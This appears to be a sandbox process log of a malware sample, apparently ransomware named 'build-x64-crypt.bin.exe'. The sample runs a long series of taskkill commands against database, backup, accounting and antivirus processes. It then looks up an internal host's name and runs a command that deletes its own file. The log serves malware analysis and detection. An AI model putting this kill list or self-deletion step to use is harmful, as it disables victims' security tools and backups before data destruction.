C:\Windows\system32\taskkill.exe
taskkill /F /T /IM Creative Cloud*
3⤵
- Kills process with taskkill
PID:1496

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM Adobe Desktop Service*
2⤵
PID:1852

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM Adobe Desktop Service*
3⤵
- Kills process with taskkill
PID:1388

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM CoreSync*
2⤵
PID:1584

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM CoreSync*
3⤵
PID:1876

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM Adobe CEF Helper*
2⤵
PID:520

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM Adobe CEF Helper*
3⤵
- Kills process with taskkill
PID:232

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM node*
2⤵
PID:1860

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM node*
3⤵
- Kills process with taskkill
PID:1096

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM AdobeIPCBroker*
2⤵
PID:1884

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM AdobeIPCBroker*
3⤵
PID:1824

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM sync-taskbar*
2⤵
PID:220

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM sync-taskbar*
3⤵
PID:1568

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM sync-worker*
2⤵
PID:1920

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM sync-worker*
3⤵
- Kills process with taskkill
PID:1560

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM InputPersonalization*
2⤵
PID:1756

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM InputPersonalization*
3⤵
- Kills process with taskkill
PID:1976

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM AdobeCollabSync*
2⤵
PID:1704

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM AdobeCollabSync*
3⤵
- Kills process with taskkill
PID:1480

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM BrCtrlCntr*
2⤵
PID:1968

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM BrCtrlCntr*
3⤵
- Kills process with taskkill
PID:1468

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM BrCcUxSys*
2⤵
PID:480

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM BrCcUxSys*
3⤵
PID:564

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM SimplyConnectionManager*
2⤵
PID:760

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SimplyConnectionManager*
3⤵
PID:1848

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM Simply.SystemTrayIcon*
2⤵
PID:1448

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM Simply.SystemTrayIcon*
3⤵
PID:1316

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM fbguard*
2⤵
PID:236

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM fbguard*
3⤵
- Kills process with taskkill
PID:1080

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM fbserver*
2⤵
PID:1932

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM fbserver*
3⤵
PID:1844

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM ONENOTEM*
2⤵
PID:1720

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM ONENOTEM*
3⤵
- Kills process with taskkill
PID:1076

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM wrapper*
2⤵
PID:1572

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM wrapper*
3⤵
PID:1072

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM DefWatch*
2⤵
PID:1984

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM DefWatch*
3⤵
- Kills process with taskkill
PID:1928

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM ccEvtMgr*
2⤵
PID:1044

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM ccEvtMgr*
3⤵
PID:1752

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM ccSetMgr*
2⤵
PID:1416

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM ccSetMgr*
3⤵
- Kills process with taskkill
PID:1556

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM SavRoam*
2⤵
PID:1464

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SavRoam*
3⤵
- Kills process with taskkill
PID:2040

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM Sqlservr*
2⤵
PID:340

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM Sqlservr*
3⤵
- Kills process with taskkill
PID:2032

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM sqlagent*
2⤵
PID:1852

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM sqlagent*
3⤵
PID:1804

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM sqladhlp*
2⤵
PID:1584

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM sqladhlp*
3⤵
- Kills process with taskkill
PID:1520

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM Culserver*
2⤵
PID:1304

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM Culserver*
3⤵
- Kills process with taskkill
PID:880

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM RTVscan*
2⤵
PID:204

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM RTVscan*
3⤵
- Kills process with taskkill
PID:208

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM sqlbrowser*
2⤵
PID:600

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM sqlbrowser*
3⤵
- Kills process with taskkill
PID:1088

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM SQLADHLP*
2⤵
PID:1072

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SQLADHLP*
3⤵
- Kills process with taskkill
PID:1924

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM QBIDPService*
2⤵
PID:1928

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM QBIDPService*
3⤵
- Kills process with taskkill
PID:1952

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM Intuit.QuickBooks.FCS*
2⤵
PID:1752

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM Intuit.QuickBooks.FCS*
3⤵
- Kills process with taskkill
PID:1532

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM QBCFMonitorService*
2⤵
PID:1556

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM QBCFMonitorService*
3⤵
- Kills process with taskkill
PID:1964

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM sqlwriter*
2⤵
PID:2040

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM sqlwriter*
3⤵
PID:1108

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM msmdsrv*
2⤵
PID:2032

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM msmdsrv*
3⤵
PID:1388

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM tomcat6*
2⤵
PID:1804

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM tomcat6*
3⤵
- Kills process with taskkill
PID:1876

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM zhudongfangyu*
2⤵
PID:660

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM zhudongfangyu*
3⤵
- Kills process with taskkill
PID:520

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM vmware-usbarbitator64*
2⤵
PID:1068

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM vmware-usbarbitator64*
3⤵
- Kills process with taskkill
PID:1096

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM vmware-converter*
2⤵
PID:216

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM vmware-converter*
3⤵
- Kills process with taskkill
PID:1824

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM dbsrv12*
2⤵
PID:1092

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM dbsrv12*
3⤵
- Kills process with taskkill
PID:1568

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM dbeng8*
2⤵
PID:836

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM dbeng8*
3⤵
- Kills process with taskkill
PID:1984

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM MSSQL$MICROSOFT##WID*
2⤵
PID:372

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM MSSQL$MICROSOFT##WID*
3⤵
PID:1756

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM MSSQL$VEEAMSQL2012*
2⤵
PID:336

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM MSSQL$VEEAMSQL2012*
3⤵
- Kills process with taskkill
PID:1416

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM SQLAgent$VEEAMSQL2012*
2⤵
PID:848

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SQLAgent$VEEAMSQL2012*
3⤵
- Kills process with taskkill
PID:1464

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM SQLBrowser*
2⤵
PID:1500

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SQLBrowser*
3⤵
- Kills process with taskkill
PID:340

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM SQLWriter*
2⤵
PID:1288

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SQLWriter*
3⤵
- Kills process with taskkill
PID:1848

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM FishbowlMySQL*
2⤵
PID:1908

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FishbowlMySQL*
3⤵
PID:1316

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM MSSQL$MICROSOFT##WID*
2⤵
PID:232

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM MSSQL$MICROSOFT##WID*
3⤵
- Kills process with taskkill
PID:1080

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM MySQL57*
2⤵
PID:764

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM MySQL57*
3⤵
PID:1844

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*
2⤵
PID:1292

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*
3⤵
- Kills process with taskkill
PID:1884

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM MSSQLServerADHelper100*
2⤵
PID:220

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM MSSQLServerADHelper100*
3⤵
- Kills process with taskkill
PID:1896

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*
2⤵
PID:1920

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*
3⤵
PID:1560

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM msftesql-Exchange*
2⤵
PID:1044

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM msftesql-Exchange*
3⤵
- Kills process with taskkill
PID:1976

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM MSSQL$MICROSOFT##SSEE*
2⤵
PID:1704

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM MSSQL$MICROSOFT##SSEE*
3⤵
- Kills process with taskkill
PID:1480

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM MSSQL$SBSMONITORING*
2⤵
PID:1968

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM MSSQL$SBSMONITORING*
3⤵
PID:1468

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM MSSQL$SHAREPOINT*
2⤵
PID:480

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM MSSQL$SHAREPOINT*
3⤵
- Kills process with taskkill
PID:564

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING*
2⤵
PID:760

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING*
3⤵
- Kills process with taskkill
PID:1432

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT*
2⤵
PID:576

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT*
3⤵
PID:1520

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM SQLAgent$SBSMONITORING*
2⤵
PID:236

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SQLAgent$SBSMONITORING*
3⤵
PID:880

C:\Windows\system32\cmd.exe
cmd /C taskkill /F /T /IM SQLAgent$SHAREPOINT*
2⤵
PID:1860

C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SQLAgent$SHAREPOINT*
3⤵
- Kills process with taskkill
PID:208

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Net.Dns]::GetHostByAddress('10.7.0.38').hostname
2⤵
PID:1960

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C timeout /T 15 /NOBREAK && del "C:\Users\Admin\AppData\Local\Temp\build-x64-crypt.bin.exe" /F
2⤵
- Deletes itself
PID:1304